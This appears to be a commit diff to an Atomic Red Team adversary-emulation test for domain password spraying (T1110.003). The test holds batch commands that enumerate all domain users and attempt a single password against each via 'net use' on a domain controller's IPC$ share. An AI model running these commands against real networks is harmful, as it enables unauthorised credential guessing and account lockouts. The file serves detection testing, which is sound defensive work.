security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

some cleanup

Browse Source
This commit is contained in:
clr2of8
2020-06-25 19:27:02 -06:00
parent 86549295ad
commit a084ff4ae6
1 changed files with 18 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1110.003/T1110.003.yaml
+18 -6
View File
@@ -1,8 +1,15 @@
attack_technique: T1110.003
display_name: 'Brute Force: Password Spraying'
atomic_tests:
- name: Password Spray all domain users
description: This atomic will create a list of all domain users in the temp directory called users.txt. It will then attempt to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the list. It will print successful authentications to the screen.
- name: Password Spray all Domain Users
description:
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list.
Any successful authentications will be printed to the screen with a message like "[*] username:password". No output will be received if no successful
authentications occur. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
supported_platforms:
- windows
input_arguments:
@@ -10,14 +17,19 @@ atomic_tests:
description: The password to try for each user in users.txt
type: string
default: Spring2020
executor:
command: |-
dependencies:
- description: |
List of domain users to password spray must exits at %tempe%\users.txt
prereq_command: |
if not exist %temp%\users.txt (exit /b 1)
get_prereq_command: |
rem Create the users.txt by parsing the "net users /domain" output
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Execute the password spray, trying the password set above for every user in the domain
executor:
command: |-
@FOR /F %n in (%temp%\users.txt) do @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
name: powershell
name: command_prompt